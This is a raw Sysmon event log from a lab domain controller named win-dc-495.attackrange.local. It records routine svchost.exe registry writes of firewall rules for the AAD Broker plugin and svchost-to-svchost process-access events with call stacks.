13241300x800000000000000010396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:20.508{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{F0470520-4E88-4698-9859-6FDD736DFDFD}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{94A00FA3-26DE-47D2-A2F2-C2D729EFD471}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 
13241300x800000000000000010394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{8CB0B3A9-9B59-484A-BF13-BDC946728D49}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x800000000000000010393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{D53537F6-2C13-4877-8FBD-EB83950F5763}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Security=Authenticate| 13241300x800000000000000010392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{FE8CA963-0FE0-45EC-987D-42B6EACB9FD6}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Security=Authenticate| 13241300x800000000000000010391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{89515849-FB45-41A6-BBB8-A39F860A1511}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x800000000000000010390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{076EC4CC-9898-458C-A972-C4686F991276}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x800000000000000010389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C0952F05-AF2B-4E8C-B96D-4E5477112A63}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x800000000000000010388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.492{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B30DC35A-01D2-40B0-95EC-69762492EC0B}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 10341000x800000000000000010387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
